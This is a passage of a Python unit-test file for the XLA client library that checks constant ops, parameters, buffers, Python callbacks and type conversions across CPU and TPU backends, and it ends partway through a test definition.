# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend,
cloud_tpu=False,
tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_] + complex_dtypes
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be stricter, so we assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
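# A minimal illustration of the leniency mentioned above (plain numpy, not
# part of the harness): np.testing treats both operands as "array-like" and
# broadcasts them, so
#   np.testing.assert_equal(np.int32(4), np.array([[4]]))  # passes
# while the explicit shape comparison used above catches the mismatch, since
#   np.asanyarray(np.int32(4)).shape  # (), which differs from (1, 1)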
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool_ dtype."""
return np.array(*args, dtype=np.bool_, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testStableComputationSerialization(self):
# Ideally we would test identical computations produced in different
# processes. For now we have this limited smoke test.
computation = self.ExampleComputation()
ref = computation.as_serialized_hlo_module_proto()
for _ in range(10):
self.assertEqual(computation.as_serialized_hlo_module_proto(), ref)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
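# Why 2**31 - 1 above: ShiftRightLogical reinterprets the int32 bit pattern
# of -1 (all 32 bits set) as unsigned before shifting, so a logical shift
# right by one yields 0x7FFFFFFF == 2**31 - 1, unlike the arithmetic shift
# tested above, which preserves the sign bit.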
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
if custom_call_for_test is None:
self.skipTest("The custom_call_for_test module is not available")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
],
api_version=xla_client.ops.CustomCallApiVersion
.API_VERSION_STATUS_RETURNING)
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class PythonCallbackTest(ComputationTest):
def testPythonCallback(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
f = lambda x, y: (x + y, x - y)
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
arg1 = np.array([10, 15, -2, 7], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
p1 = ops.Parameter(c, 1, shape)
out, keepalive = self.backend.emit_python_callback(
f, c, [p0, p1], [shape, shape])
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 + arg1, arg0 - arg1])
del out, keepalive
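# Note on `keepalive` above (an assumption based on the name and usage, not
# on documentation): it appears to own the Python-side state backing the
# emitted callback and must stay referenced for as long as an executable
# built from `c` may run, which is why the tests delete it only after
# execution has finished.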
def testTokens(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x, y):
assert y is None, y
return None, x + 1
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
token_shape = xla_client.Shape.token_shape()
p0 = ops.Parameter(c, 0, shape)
token = ops.CreateToken(c)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0, token], [token_shape, shape])
out = ops.GetTupleElement(out, 1)
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 + 1])
del out, keepalive
def testStriding(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
assert x.flags.f_contiguous, x.strides
# Force the output array to have C layout, which will require a
# transpose back to the expected Fortran layout.
return np.ascontiguousarray(x * 2),
arg0 = np.arange(12, dtype=np.int16).reshape(3, 4)
shape_f_layout = xla_client.Shape.array_shape(
arg0.dtype, arg0.shape, layout=(0, 1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape_f_layout], [shape_f_layout])
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 * 2])
del out, keepalive
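# Layout note for the test above (a sketch, not part of the harness): a
# minor-to-major layout of (0, 1) makes dimension 0 the fastest-varying one,
# i.e. Fortran/column-major order, which is why the callback observes an
# f_contiguous array; returning np.ascontiguousarray(...) hands back C order
# and forces a transpose back to the expected layout. For comparison, in
# plain numpy:
#   a = np.arange(12, dtype=np.int16).reshape(3, 4)   # C order
#   assert np.asfortranarray(a).flags.f_contiguous    # column-major copy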
tests.append(PythonCallbackTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
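# Ordering note for the test above: arguments are bound by parameter number,
# not by the order in which the Parameter ops were created, so
# arguments=[arg0, arg1] still maps arg0 to p0 and arg1 to p1 even though p1
# was built first; using the non-commutative Sub makes any reversal visible
# in the result.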
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testXlaShapeIndex(self):
a = xla_client.ShapeIndex((1, 2))
b = xla_client.ShapeIndex((1, 2))
c = xla_client.ShapeIndex((2, 3))
self.assertEqual(a, b)
self.assertNotEqual(b, c)
def testLayout(self):
f32 = xla_client.PrimitiveType.F32
a = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
b = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
c = xla_client.Shape.array_shape(f32, (2, 3), (1, 0)).layout()
self.assertEqual(a.minor_to_major(), (0, 1))
self.assertEqual(b.minor_to_major(), (0, 1))
self.assertEqual(c.minor_to_major(), (1, 0))
self.assertEqual(a, b)
self.assertNotEqual(a, c)
self.assertNotEqual(b, c)
self.assertEqual(hash(a), hash(b))
self.assertNotEqual(hash(a), hash(c))
self.assertNotEqual(hash(b), hash(c))
def testBlockUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_until_ready()
# This test merely checks that nothing goes awry when we call
# block_until_ready(); it's difficult to test anything else.
def testBlockUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The object of type {} does not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
self.assertTrue(buffer.is_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
with self.assertRaises(RuntimeError):
buffer.is_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
self.assertEqual(self.backend.devices()[0].live_buffers(),
self.backend.live_buffers())
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
self.assertNotEqual(id(x), id(y))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool_, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
